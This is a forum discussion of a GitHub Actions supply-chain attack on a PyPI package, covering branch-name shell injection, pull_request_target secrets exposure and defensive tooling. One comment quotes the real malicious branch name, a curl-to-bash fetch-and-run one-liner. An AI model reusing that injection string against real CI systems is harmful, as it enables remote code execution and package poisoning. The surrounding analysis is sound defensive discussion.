1. 144
    1. 77

      For those who are curious but don’t want to pick through the github issue threads:

      A malicious PR making a very innocent looking change to the README used a branch name with shell commands in it, formatted in a way that would cause CI jobs to execute those commands when performing a build for upload to PyPi. Those commands downloaded a crypto miner and embedded it into the release package.

      So the automated builds that were getting uploaded to PyPi had the miner, but the source in github did not and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.

      It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.

      1. 46

        There was an action that echo’d the branch name without sanitizing anything: https://github.com/advisories/GHSA-7x29-qqmq-v6qc

        Another lesson in never trusting user input

        1. 58

          I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think the whoever wrote that code was aware they were trusting the branch name, or what properties of the branch name exactly they were trusting. So the lesson is not really actionable.

          I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.

          For e.g. SQL queries it seems the industry has learned the lesson and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.

          The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?

          1. 18

            I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…

            1. 21

              Before all the hip yaml based CI systems, like github actions, pretty much everyone was using Jenkins.

              The sorta modern way to use Jenkins these days is to write Groovy script, which has stuff like checkout scm, and various other commands. Most of these are from Java plugins, and so the command never ends up going anywhere near a shell, though you do see a lot of use of the shell command function in practice (i.e. sh "make").

              Kinda a shame that Jenkins is so wildly unpopular, and these weird yaml-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be in my opinion.

              Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.

              1. 5

                I’ve used Jenkins quite a bit, that’s one of the inspiration source for that idea indeed. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.

                My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.

                1. 1

                  groovy is okay. Not the best language, but way ahead any other language I’ve ever seen in a popular CI solution. And ansible should die.

                  1. 1

                    Have you considered Dagger?

                    edit: I just had to read a little down and someone else points you the same way…

                    1. 1

                      I haven’t heard about it before it was suggested in this thread, I’m going to give it a try.

                  2. 4

                    I doubt anyone would pick Groovy as a language for anything today.

                    I use Groovy at $DAILYJOB, and am currently learning Ruby (which has a lot more job listings as Elixir). The appeal of both languages are the same: it is incredibly easy to design DSLs with it (basically what Jenkins and Gradle use). Which is precisely what I work with at $DAILYJOB. The fact it’s JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.

                  3. 5

                    Dagger looks interesting for this sort of use case: https://dagger.io/

                    1. 3

                      This looks really interesting, thanks for the pointer! Maybe it’s already good for things I want to do and I don’t need to make anything at all, or may contribute something to it.

                    2. 3

                      That’d be lovely.

                      The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.

                      1. 3

                        Yeah in dealing with github’s yaml hell I’ve been wishing for something closer to a typed programming language with a proper library e.g. some sort of simplified-haskell DSL à la Elm, Nix, or Dhall.

                        1. 2

                          They all do? They all provide ways to build specific branches defined in yaml files or even via UIs rather than letting that work for your shell scripts. Personally I find all those yaml meta-languages all inferior than just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:

                          What’s the value of a CI server other than running a command on commit?

                          But back to your point. Why? What you need to do is sanitize user input. That is completely independent of being shell script versus another language. Shellscripts are actually higher level than general purpose programming languages.

                          1. 3

                            I’m certainly not saying that one doesn’t need to sanitize user input.

                            But I want the underlying system to provide a baseline level of safety. Like in Python, unless I’m calling eval() it doesn’t matter that some input may contain the character sequence os.system(...; and if I’m not calling os.system() and friends, it doesn’t matter if a string may have rm -rf in it. When absolutely any data may end up being executed as code at any time, the system has a problem, as of me.

                          2. 2

                            Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.

                          3. 12

                            In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string in the shell script itself, set any values you want to use as env vars and use those instead. e.g.:

                            run: |
                              echo "Bad: ${{ github.head_ref }}"
                              echo "Good: $GITHUB_HEAD_REF"
                            env:
                              GITHUB_HEAD_REF: github.head_ref
                            
                            1. 7

                              I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is a lack of good defaults and a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:

                              echo "Bad: ${{ github.head_ref }}"
                              echo "Good: $GITHUB_HEAD_REF" # or so @kylewlacy says
                              

                              I do not see any major difference immediately. Compare to Pug (nee Jade):

                              Safe: #{github.head_ref}
                              Unsafe: !{github.head_ref}
                              

                              Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).

                              1. 13

                                But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.

                              2. 4

                                A few years Over a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety” - instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues in a structural way.

                                1. 1

                                  I’m reminded of my similar post focused more on encoding (from the same year! hooooboy).

                                  1. 1

                                    Good post! I’m happy to say that CHICKEN (finally!) does encoding correctly in version 6.

                                2. 1

                                  Serialize, don’t sanitize… I love it! I’m gonna start saying this.

                                3. 9

                                  AFAIU, the echoing is not the problem, and sanitizing wouldn’t help.

                                  The problem is that before the script is even executed, parts of its code (the ${{ ... }} stuff) are string-replaced.

                                  1. 1

                                    Yeah. The problem is that the echo command interpretes things like ${{...}} and executes it. Or is it the shell that does it in any string? I’m not even sure and that is problem. No high level language does that. Javascript uses eval, which is already bad enough, but at least you can’t use it inside a string. You can probanly do hello ${eval(...)} but then it is clear that you are evaluating the code inside.

                                      1. 3

                                        It’s the shell that evaluates $... syntax. $(cmd) executes cmd, ${VAR} reads shell variables VAR and in both cases the shell replaces the $... with the output before calling the echo program with the result. Echo is just a dumb program that spits out the arguments its given.

                                        Edit: but the ${{ syntax is GitHub Actions’ own syntax, the shell doesn’t see that as GH Actions evaluates it before running the shell command.

                                      2. 1

                                        Oh thanks for explaining!

                                      3. 7

                                        The part I don’t get is how this is escalated to the publish, that workflow only seems to run off of the main branch or a workflow dispatch.

                                        1. 5

                                          cf https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 it seems they were using the pull_request_target event which grants PR CI’s access to repo secrets, so they could not only inject the miner, but publish a release?

                                          Does anyone have a copy of the script so we can see what it did?

                                          Funny that they managed to mine only about $30 :)

                                          1. 10

                                            Honestly, shining a spotlight on this attack with a mostly harmless crypto miner is a great outcome.

                                            Less obvious key-stealing malware probably would have caused far more pain.

                                            1. 6

                                              I knew crypto would have great use cases eventually

                                          2. 3

                                            The pull_request_target event that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.

                                            Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell script-based privilege escalation code the easy path.

                                            At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.

                                            1. 4

                                              cf https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 it seems they were using the pull_request_target event which grants PR CI’s access to repo secrets, so they could not only inject the miner, but publish a release?

                                              Does anyone have a copy of the script so we can see what it did?

                                              Funny that they managed to mine only about $30 :)

                                            2. 3

                                              Wow. I was looking for that kind of explanation and hadn’t found it yet. Thank you for finding and sharing it.

                                              1. 2

                                                No, the lesson is to never use bash, except for using to start something that is not bash.

                                                1. 1

                                                  Oh, this is probably a better top level link for this post!

                                                  1. [Comment removed by author]

                                                    1. 3

                                                      A bot made the PR? How does that work?

                                                      1. 2

                                                        I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name which executed arbitrary code during GitHub Actions. Sorry if I misunderstood your question.

                                                    2. 7

                                                      Hm, the dots don’t connect for me yet. I can just make a PR with changes to build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?

                                                      It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?

                                                      So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?

                                                      1. 15

                                                        Ah, I am confused!

                                                        See https://stackoverflow.com/questions/74957218/what-is-the-difference-between-pull-request-and-pull-request-target-event-in-git

                                                        There’a a way to opt-in to trigger workflow with main branch secrets when a PR is submitted, and that’s exactly what happened here.

                                                        1. 7

                                                          I don’t get why this option exists!

                                                          Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?

                                                          1. 4

                                                            If I understand it correctly, I can maybe see it used in a non-public context, like for a companies internal CI.

                                                            But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.

                                                            1. 3

                                                              Prioritizing features over security makes total sense in this context! This was eloquently formulated by @indygreg! Actions:

                                                              • reduce maintenance cost for Microsoft
                                                              • increase the value of the actions platform for the users
                                                              • lock in the users into a specific platform

                                                              You clearly want them to be as powerful as possible!

                                                              1. 2

                                                                Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.

                                                                There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.

                                                          2. 2

                                                            Thanks for the explanation, I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my Github repos, it would seem to be that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?

                                                            1. 8

                                                              While the branch name was malicious, is there also a best practice to pull out here for maintainers?

                                                              Don’t ever use pull_request_target trigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.

                                                              The root cause here is not shell injection. The root cause is that untrusted input gets into CI run with creds at all. Of course, GitHub actions doesn’t do that by default, and you have to explicitly opt-into this with pull_request_target. See the linked SO answer in a sibling commnet, it explains the issue quite nicely.

                                                              Ah, comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache to make the main branch CI pull bad data in! Clever! So, just don’t give any permissions for pull_request_trigger jobs!

                                                              1. 4

                                                                My public repos don’t run CI jobs for PRs automatically, it has to be manually approved. I think this is the default. Not sure what happened in this case though.

                                                                1. 4

                                                                  By default it has to be approved for first-time contributors. Not too hard to get an easy PR merged in and get access to auto-running them.

                                                                  1. 9

                                                                    It is totally fine to run CI on PR. CI for PRs does not get to use repository secrets, unless you go out of your way to also include secrets.

                                                                    If you think your security depends on PRs not triggering CI then it’s is likely that either:

                                                                    • you don’t understand why you project is actually secure
                                                                    • your project is actually insecure

                                                                    GitHub “don’t run CI for first time contributors” has nothing to do with security and has everything to do with using maintainer’s human judgement to protect free GitHub runners free compute from being used for mining crypto.

                                                                    That is, this is a feature to protect GitHub/Microsoft, not your project.

                                                                    1. 2

                                                                      Should be easily solvable by billing those minutes to the PR creator.

                                                                      I guess there is also the situation where you provide your own runner rather than buying it from Github. In that case it seems like a reasonable precaution to restrict unknown people from using it.

                                                                      1. 4

                                                                        Should be easily solvable by billing those minutes to the PR creator.

                                                                        Yes! I sympathize GitHub for having to implement something here on a short notice when this happened the first time, but I am dismayed that they didn’t get to implementing a proper solution here: https://matklad.github.io/2022/10/24/actions-permissions.html

                                                                        I guess there is also the situation where you provide your own runners

                                                                        Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.

                                                              2. 1

                                                                Thank you, that’s a great summary, and a very interesting attack vector.

                                                                It’s strange (to me) that a release would be created off of an arbitrary user created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.

                                                              3. 22

                                                                How can we hope to win the memory-safety war when we’re still losing the 1960s macro-substitution-injection-safety war?

                                                                1. 9

                                                                  I’m working on a full writeup on this, as well as how the Ultralytics maintainers could have likely nipped this in the bud by using a tool like zizmor to find these weaknesses ahead of time: https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection

                                                                  1. 1

                                                                    Is zizmor similar to https://app.stepsecurity.io/ in terms of the ruleset enforced/suggested, e.g.

                                                                    permissions:
                                                                      contents: read
                                                                    

                                                                    at the top level etc? Would be interested to hear about the differences.

                                                                    1. 3

                                                                      To my understanding, StepSecurity is a runtime instrumentation layer: you install their agent, and it (in theory) notifies you and rejects potentially malicious activities on your runner.

                                                                      zizmor is a static tool: you run it on your workflows (either locally or in CI), and you fix whatever findings it gives you.

                                                                      1. 2

                                                                        The “harden” runner from them is exactly what you are describing.

                                                                        But they also have a web app that launches a one-time audit of all your workflows and suggests changes (adding a workflow for their “harden” runner is just one of many and you are free to skip it). See https://app.stepsecurity.io/securerepo?repo=https://github.com/woodruffw/zizmor for an example. And that’s the tool I am interested in comparing to zizmor - but I guess there is only way to find out.

                                                                        Edit: I ran zizmor against a repo I previously hardened with the StepSecurity scanner (mainly limiting the GITHUB_TOKEN permissions and hash-pinning action versions) and zizmor is excellent! It found two extra significant issues - persisted credentials and, of course, template injection (well, still not a silver bullet because one can dump the whole worker process), our highlight of the day. Thanks for a great tool, @yossarian!

                                                                        1. 1

                                                                          Thanks for mentioning StepSecurity! This is Varun, Co-Founder of StepSecurity. I wanted to provide some clarification about our platform. Specifically, vulnerabilities like script injection and Pwn Request are detected as part of the enterprise tier, but these are not auto-fixed via app.stepsecurity.io/securerepo. The securerepo tool focuses solely on applying automated fixes for issues that can be safely remediated without manual intervention.

                                                                          The excellent blog post https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection, mentions that this exploit exfiltrated repository credentials to webhook[dot]site. To add some context about Harden-Runner, it is specifically designed to detect such anomalous outbound calls—those not previously observed in a job, and when used in block mode, can block them in real-time. I hope this helps clarify!

                                                                          1. 1

                                                                            Ah, I wasn’t aware of their dashboard – I’m curious to hear if it provides useful insights.

                                                                            (I am not a big fan of runtime instrumentation for this kind of stuff, so I’m glad to hear this dashboard exists.)

                                                                    2. 8

                                                                      It feels really dystopian to me that every issue and PR on the Ultralytics repo gets an instant AI reply. And if you’re not a member of the org, a bot locks your post and edits it to replace the content? I know that if I was new to this, asking a genuine question about how to use it, and was met with that, I’d be scared away.

                                                                      1. 6

                                                                        Step 1: everyone’s fed up of messy spaghetti CI - create a new simple CI system based on static config files (woo YAML!)

                                                                        Step 2: we need the ability to execute arbitrarily complex workflows in CI - rub some templating and shell on your YAML

                                                                        Step 3: everyone’s fed up of messy spaghetti CI - create a new simple CI system based on static config files (woo YAML!)

                                                                        1. 5

                                                                          Looking through those posted CI logs, they were using attestations. I would be interested to know if this was detectable from the attestation.

                                                                          Re-reading the docs, sounds like attestations only attest that “this package was built by a github action in the ultalytics repo” and not “the code in this package matches the code in this repo exactly” which seems like a common misconception based on comments like this that say things like “Attestations provide cryptographic proof linking published packages to specific code states.”

                                                                          1. 8

                                                                            There is a fundamental difference to what attestations can do, and what things like “trusted publishing” does. Currently “trusted publishing” doesn’t give you full provenance of what happened and where the code is, as the issue here is a poisoned build cache that was shared between the PR and the main branch.

                                                                            What would probably have detected this is to have reproducible builds, and an independent and clean build of the published wheel to compare against.

                                                                            1. 4

                                                                              So:

                                                                              “Trusted Publishing”, as used by PyPI, is not about “end users can trust that the package isn’t malicious”. It’s about “you, the owner/developer of the package, can trust that your CI/CD provider has only a short-lived narrow-scoped PyPI credential whose accidental exposure would not be an ongoing disaster”. In other words, it’s about letting you trust GitHub or GitLab or another CI/CD provider with permission to publish your packages.

                                                                              “Attestations” are a form of package signing. The initial use case – i.e., what’s supported so far – is verifying that a particular CI/CD provider’s Trusted Publishing flow was what uploaded the package and that the contents of the artifact you actually receive match the contents of what that flow uploaded. This, again, does not provide any guarantee to the community that a package is non-malicious or has been vetted for security issues.

                                                                              So as I understand it the “particular code states” you refer to means that the bits you download from PyPI are the same bits uploaded from the pipeline. It’s letting you trust that nobody has compromised PyPI itself and replaced the package with something different, because they would not be able to produce a valid attestation for the changed package contents claiming that it was still something that came from a TP pipeline.

                                                                              Similarly, I could set up a manually-constructed pipeline with access to a PGP key and have the pipeline sign a package; that would not tell you anything about whether the code in the package is safe or good, just that the pipeline (which is what has the key) is the thing that signed it, and the contents haven’t changed since the moment of signing. Nobody would take that as a lack of functionality in PGP, or as a cryptographic failure on the part of PGP signatures.

                                                                              1. 1

                                                                                It surprises me that there’s nowhere I see in the Trusted Publishing docs that explains what it protects against, hence the misconceptions. Protecting against a compromise of pypi is such a straightforward goal that its absence is so confusing to me.

                                                                                Didn’t even see it in clarification posts like https://blog.yossarian.net/2024/11/18/Security-means-securing-people-where-they-are

                                                                                1. 3

                                                                                  I believe attestations are capable of doing a lot more in the future, but right now they basically are a record of provenance and integrity for packages which came from a Trusted Publishing pipeline.

                                                                                  Going into a bit more specifics, as I understand it:

                                                                                  • If you are the owner of project foo on PyPI, you can designate a particular pipeline or workflow in a particular CI/CD system (GitHub Actions, GitLab CI, etc.) as having permission to publish new releases/artifacts for foo to PyPI on your behalf.
                                                                                  • That flow is enabled by OpenID Connect (“OIDC”), which allows the CI/CD system to prove its identity to PyPI in order to obtain a short-lived API token whose permissions are narrowly scoped to “can publish foo”.

                                                                                  That’s the basic Trusted Publishing setup. What’s added by annotations is:

                                                                                  • The OIDC flow issues a JSON Web Token (JWT) in response to the publishing pipeline proving its identity.
                                                                                  • That JWT, which represents the “identity” of a particular machine running the TP workflow, is used in a Sigstore signing flow which involves issuance of both an X.509 certificate (which is committed to a public Certificate Transparency log) and a short-lived signing key.
                                                                                  • The signing key is then used to generate the signed metadata (the attestation) on the artifact which will be uploaded to PyPI.

                                                                                  This actually gives you both integrity (it’s a digital signature, so you can always check the contents of the artifact you download from PyPI against it) and provenance (you can prove not just that the artifact was uploaded from some Trusted Publishing platform, but which one and even which specific machine).

                                                                                  If a project advertises that it does Trusted Publishing via a specific CI/CD service, you gain the ability to detect compromise – if someone pops your individual PyPI account, or potentially the whole site, they still can’t retroactively generate correct attestations for existing artifacts, which means they can’t secretly swap out those artifacts with malicious versions.

                                                                                  1. 3

                                                                                    I read up a bit more on how the signature stuff works. The full process is:

                                                                                    1. Client generates a public/private keypair which will only exist in-memory and only for the duration of this signature process.
                                                                                    2. Client submist the OIDC JWT and public key to a Sigstore Fulcio CA instance.
                                                                                    3. CA hits the .well-known OIDC config URL of the JWT issuer to get keys to verify the JWT.
                                                                                    4. If JWT verification succeeds, CA verifies the client possesses the private key corresponding to the public key submitted in (2) via challenge/CSR process.
                                                                                    5. If client proves its possession of the private key, CA issues and signs an X.509 certificate with a short lifetime (10 minutes), using metadata from the OIDC JWT and embedding the public key from step (2). The certificate is published to a public Certificate Transparency log.
                                                                                    6. Client uses the private key from steps (1) to produce a signature for the artifact (i.e., the package). 7 Client destroys the private key.

                                                                                    So the result is that the private key no longer exists and cannot be reused, but because the public key was published to the CA’s CT log as part of the process, it can always be recovered and used to verify the signature. The additional claims in the JWT are also present in the certificate and so it’s possible to verify things like which CI pipeline signed the artifact.

                                                                                    1. 1

                                                                                      Thank you for looking into it! I plan to put my money where my mouth is and contribute some docs, so this is really helpful!

                                                                                  2. 1

                                                                                    That aligns with my assessment of what “trusted publishing” and “attestations” mean in this context. I’m on the fence about how much of an improvement those represent vs the old status quo.

                                                                                2. 5

                                                                                  This is your friendly reminder that all CI is RCE As a Service.

                                                                                  1. 2

                                                                                    This looks to me like they are executing sensitive GitHub Actions workflows anytime anyone opens a PR against the main branch (e.g. the publish workflow). It isn’t in itself the vulnerability exploited here (that appears to be the fact that the branch name is evaluated in shell unescaped), but it’s a huge footgun with GHA that I’ve seen many times. IMO you should only run those kind of workflows when a commit to main is pushed (or whatever branch represents “production”) - this means that the only time a sensitive workflow runs is when a collaborator on the repo has signed off on a change and merged it. It’s still vulnerable to someone not paying attention, but way less risky than letting a random person drive by and execute your workflows with arbitrary inputs.

                                                                                    I thought GitHub automatically disabled workflow runs for people who aren’t collaborators on the repo, as another mitigation for this kind of thing, but maybe I explicitly enabled that - but again, if you aren’t paying attention, stuff like this will happen.

                                                                                    Interesting attack though, extremely visible in the PR itself, but once merged, it becomes very hard to trace.

                                                                                    1. 8

                                                                                      I thought GitHub automatically disabled workflow runs for people who aren’t collaborators on the repo

                                                                                      I’ve already said this in the discussion, but I want to repeat this as it is really important.

                                                                                      Not running workflows from non-collaborators is not a security feature. A security feature is not exposing secrets to workflows triggered by forks.

                                                                                      The problem here is not that some unexpected code got run. The problem is that it was running with access to secrets it shouldn’t have had.

                                                                                      1. 1

                                                                                        Right, exactly, sorry if that wasn’t clear from my initial comment. I’m specifically talking about running privileged workflows for randoms.

                                                                                        The part you quoted from my comment was about a mitigation GitHub implemented to try and make this mistake less easy to make (by preventing the workflows from running without explicit permission of the repo owner), but it is just a mitigation, it is still not acceptable to operate that way.

                                                                                        1. 4

                                                                                          No, this is not a mitigation for this issue. GitHub doesn’t need a mitigation here, because it does the right thing by default — workflows running on forks don’t have access to secrets.

                                                                                          If you have a workflow which runs on your main branch, and uses some token to publish your stuff to npm, this workflow will run on a fork, but it won’t be able to publish to npm, because it won’t have a token.

                                                                                          There’s no such thing as a privileged or non privileged workflow. Any workflow is arbitrary, untrusted code! What is privileged is the secrets with which a given workflow runs.

                                                                                          1. 1

                                                                                            Yes? I’m not talking about that, I’m talking about running workflows with secrets when PRs are submitted/changed by random people. GitHub not running workflows for strangers by default is a mitigation for that happening to people who don’t know better, or made a mistake in their config.

                                                                                            Workflows running without secrets in forks is a problem too, but way less problematic than with them, which is where this exploit happened IIUC.

                                                                                            1. 2

                                                                                              GitHub not running workflows for strangers by default is a mitigation for that happening to people who don’t know better, or made a mistake in their config.

                                                                                              Not really, this feature was implement on a short notice to prevent abusing free actions runners to mine crypto: https://github.blog/open-source/maintainers/github-actions-update-helping-maintainers-combat-bad-actors/.

                                                                                              1. 1

                                                                                                Whether that was the intent or not, it still acts as a mitigation for that situation. A mitigation isn’t necessarily a cure-all, it can be something that simply reduces attack surface, or prevents certain types of attacks, I fail to see how not running workflows automatically isn’t a mitigation by this measure.

                                                                                                I’m not sure why you’re choosing to argue with me about this anyway, you were preaching to the choir with your first reply, and I’m in full agreement with you about the issues with GitHub Actions. As best I can tell, we’re talking past each other here.

                                                                                                1. 5

                                                                                                  It seems so indeed! I honestly can’t really identify whether we are in agreement or not, but my goal here isn’t necessarily to reach agreement with you in particular, but to highlight a specific, easy to fall for misconception for the benefit of the reader (definitely not claiming that you have this misconception, just that the wording you used can be read as suggestive of one).

                                                                                                  The misconception is that, to secure CI, you need to control what is being run, and prevent untrusted code from being executed. This is a readily believable misconception, to a large part because of this free-compute-mining mitigation. Even in this very thread, the focus is on the SQL-injection part — as if, if we just didn’t use shell, the thing would be secure.

                                                                                                  I firmly believe that this approach isn’t fruitful in the context of public forges like GitHub. CI is, by design, an RCE as a service. If you try to make it secure by making fine-grained decisions about which parts of untrusted code are fine to interact with, you are bound to fail.

                                                                                                  Instead, what is needed is to make sure that, no matter what untrusted code is being run, it can’t have any harmful side-effects. The way GitHub implements this is by making any secrets unavailable to the pull requests from forks. The crucial part of this feature is that this doesn’t require any configuration.

                                                                                                  In a world where some workflows are marked as safe to run only on main, and some as safe to run on PRs, something, somewhere will get misconfigured. Keeping trusted and untrusted parts a configuration away is just not good enough.

                                                                                                  Luckily, this is not how it works on GitHub — you can misconfigure your public workflow to run on PRs, and nothing bad would happen, because there’s security at the different layer — PRs from forks don’t get access to secrets. That is the key property — security (access to secrets) is orthogonal to the rules for triggering workflow.

                                                                                                  So this is the specific phrasing I push against:

                                                                                                  you should only run those kind of workflows when a commit to main is pushed

                                                                                                  While running such workflows on PRs is not useful, it should only be a waste on CI resources, not a security vulnerability. What you should be safe-guarding, and what GitHub does actually safe-guards, are the secrets that the workflow can access.

                                                                                                  Of course, GitHub allows to opting-in into sharing secrets by using pull_request_target trigger (which is different from pull_request). The docs warn about security implication sufficiently, but they could have used more syntactic salt when naming the feature, as it is sudo efficiently.

                                                                                                  I guess, what I am saying can be compressed as such:

                                                                                                  “Never use pull_request_target, use only pull_request” is an efficient approach to security.

                                                                                                  “Make sure that sensitive workflows are only run on main” is an ineffective approach to security.

                                                                                                  1. 4

                                                                                                    Agreed. The vulnerability in this case composed multiple exploitable issues in a chain, but fundamentally started with the use of the pull_request_target trigger.

                                                                                                    I think where we probably differ is that you say my point about limiting the contexts in which you run workflows is ineffective, but I would argue it is part of a defense in depth strategy - you’ve reduced the attack surface, and that allows you to focus your efforts.

                                                                                                    I’m also of the opinion that it is easier to open yourself up to exploits using pull_request triggers in general - because someone might think “oh, I’d sure like if PRs would run this workflow when a label is added, or when it is moved out of draft status”, add one of the pull_request_target triggers thinking it is just an extension of pull_request, and now someone can drive-by your repo and exfil secrets.

                                                                                                    Anyway, I appreciate the reply, I think clarifying things for readers who maybe aren’t as familiar with the ways this stuff can go pear-shaped is valuable - you are certainly are more mindful of educating the reader than I am!

                                                                                    2. 2

                                                                                      One possible mitigation is if branch names[1] with shell-unsafe characters (e.g. ‘$’) were simply disallowed in the first place.

                                                                                      [1] Like this one: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

                                                                                      1. 2

                                                                                        I agree strongly, and am surprised that no one else is bringing the idea up — a deep problem here is that we tend to write code with a mental picture of the data that the code is manipulating, and that someone writing code that deals with a branch name is thinking of a string that vaguely slug-like: letters, numbers, some dashes. Maybe a colon or something if the project gets really crazy. But the underlying system refuses to undertake the reasonable step of actually locking down branch names to looking reasonable. I’m not sure what the thinking is. That GitHub should allow anything git allows? And presumably git was following an old tradition from Unix filenames, which can have all kinds of nonsense characters inside.

                                                                                        I am not sure which motivation for the system designer is stronger in cases of poor design like this: (a) the social fear that they will look dour and Puritan if they impose a rule like “branch names need to be letters numbers and dashes”, or (b) the technical fear that someone, someday, will actually desperately need to include a semicolon and double-quite in a branch name, but won’t be able to because GitHub disallowed it, and devastation will follow because someone made an overly strict rule and treated other developers like children.

                                                                                      2. 1

                                                                                        This pattern of vulnerability is my biggest fear when using Python wheels, or any other binary executable that doesn’t come from a trusted source like a Linux distro.